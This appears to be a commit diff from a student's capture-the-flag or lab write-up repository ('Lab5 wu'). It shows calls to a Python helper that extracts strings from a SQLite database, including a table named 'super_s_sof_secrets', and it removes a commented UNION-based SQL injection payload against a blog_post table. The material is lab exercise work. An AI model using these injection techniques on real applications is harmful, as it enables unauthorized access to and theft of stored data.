Lab5 wu
This commit is contained in:
@@ -60,11 +60,3 @@ def stringer(column: str, table: str, where: str = "1 = 1", max: int = 50) -> li
|
|||||||
#print(stringer("name", "sqlite_master"))
|
#print(stringer("name", "sqlite_master"))
|
||||||
#print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100))
|
#print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100))
|
||||||
print(stringer("secret", "super_s_sof_secrets", max=120))
|
print(stringer("secret", "super_s_sof_secrets", max=120))
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# SELECT id, title, content FROM blog_post WHERE title LIKE '<input>
|
|
||||||
#' AND id = 0 UNION SELECT id, title, content FROM blog_post WHERE title LIKE 'flag'; --
|
|
||||||
|
|||||||
Submodule pa/writeups updated: 361a218bb2...6b92b0e983
Reference in New Issue
Block a user